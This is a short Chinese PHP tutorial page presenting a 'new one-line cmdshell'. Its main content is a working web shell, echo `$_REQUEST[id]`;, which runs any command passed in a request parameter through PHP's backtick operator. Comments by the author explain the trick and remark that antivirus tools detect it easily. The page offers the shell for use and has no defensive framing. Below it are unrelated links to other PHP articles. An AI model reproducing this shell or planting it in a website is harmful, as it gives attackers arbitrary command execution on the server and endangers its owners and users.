php一句話cmdshell新型 (非一句話木馬)
更新時間:2009年04月18日 12:04:17 作者:
php運行時如果遇見字符``(鍵盤上~符號的下檔鍵)總會嘗試著執(zhí)行``里面包含的命令,并返回命令執(zhí)行的結果(string類型);
復制代碼 代碼如下:
<?php
/*一個新型的php一句話cmdshell(非一句話木馬)
//原理:php運行時如果遇見字符``(鍵盤上~符號的下檔鍵)總會嘗試著執(zhí)行``里面包含的命令,并返回命令執(zhí)行的結果(string類型);
//局限性:特征碼比較明顯,``符號在php中很少用到,殺毒軟件很容易以此為特征碼掃描到并警報;``里面不能執(zhí)行php代碼;
//write by skyfire
*/
echo `$_REQUEST[id]`;
?>

相關文章
Laravel的下載以及使用composer來安裝debugbar擴展包圖文教程
這篇文章主要介紹了Laravel的下載以及使用composer來安裝debugbar擴展包圖文教程,圖文講解的比較清晰,有不太會的同學可以研究下2021-01-01PHP的反射動態(tài)獲取類方法、屬性、參數(shù)操作示例
這篇文章主要介紹了PHP的反射動態(tài)獲取類方法、屬性、參數(shù)操作,結合實例形式分析了PHP反射的功能、原理及基于反射動態(tài)獲取類方法、屬性、參數(shù)相關操作技巧,需要的朋友可以參考下2020-03-03PHP面向?qū)ο蟪绦蛟O計重載(overloading)操作詳解
這篇文章主要介紹了PHP面向?qū)ο蟪绦蛟O計重載(overloading)操作,結合實例形式詳細分析了php面向?qū)ο蟪绦蛟O計重載原理、實現(xiàn)方法及相關操作技巧,需要的朋友可以參考下2019-06-06PHP實現(xiàn)獲取毫秒時間戳的方法【使用microtime()函數(shù)】
這篇文章主要介紹了PHP實現(xiàn)獲取毫秒時間戳的方法,結合實例形式分析了php使用microtime()函數(shù)獲取、轉(zhuǎn)換毫秒級時間戳的相關操作技巧,需要的朋友可以參考下2019-03-03使用php自動備份數(shù)據(jù)庫表的實現(xiàn)方法
下面小編就為大家?guī)硪黄褂胮hp自動備份數(shù)據(jù)庫表的實現(xiàn)方法。小編覺得挺不錯的,現(xiàn)在就分享給大家,也給大家做個參考。一起跟隨小編過來看看吧2017-07-07